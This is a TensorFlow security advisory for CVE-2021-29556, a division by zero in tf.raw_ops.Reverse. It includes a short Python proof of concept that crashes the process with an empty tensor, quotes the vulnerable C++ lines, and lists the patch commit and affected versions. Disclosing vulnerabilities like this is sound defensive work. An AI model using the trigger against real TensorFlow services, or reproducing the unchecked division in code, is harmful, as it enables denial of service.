1## TFSA-2021-045: Division by 0 in `Reverse` 2 3### CVE Number 4CVE-2021-29556 5 6### Impact 7An attacker can cause a denial of service via a FPE runtime error in 8`tf.raw_ops.Reverse`: 9 10```python 11import tensorflow as tf 12 13tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) 14dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) 15 16tf.raw_ops.Reverse(tensor=tensor_input, dims=dims) 17``` 18 19This is because the 20[implementation](https://github.com/tensorflow/tensorflow/blob/36229ea9e9451dac14a8b1f4711c435a1d84a594/tensorflow/core/kernels/reverse_op.cc#L75-L76) 21performs a division based on the first dimension of the tensor argument: 22 23```cc 24const int64 N = input.dim_size(0); 25const int64 cost_per_unit = input.NumElements() / N; 26``` 27 28Since this is controlled by the user, an attacker can trigger a denial of 29service. 30 31### Patches 32We have patched the issue in GitHub commit 33[4071d8e2f6c45c1955a811fee757ca2adbe462c1](https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1). 34 35The fix will be included in TensorFlow 2.5.0. We will also cherrypick this 36commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 372.1.4, as these are also affected and still in supported range. 38 39### For more information 40Please consult [our security 41guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for 42more information regarding the security model and how to contact us with issues 43and questions. 44 45### Attribution 46This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu 47X-Team. 48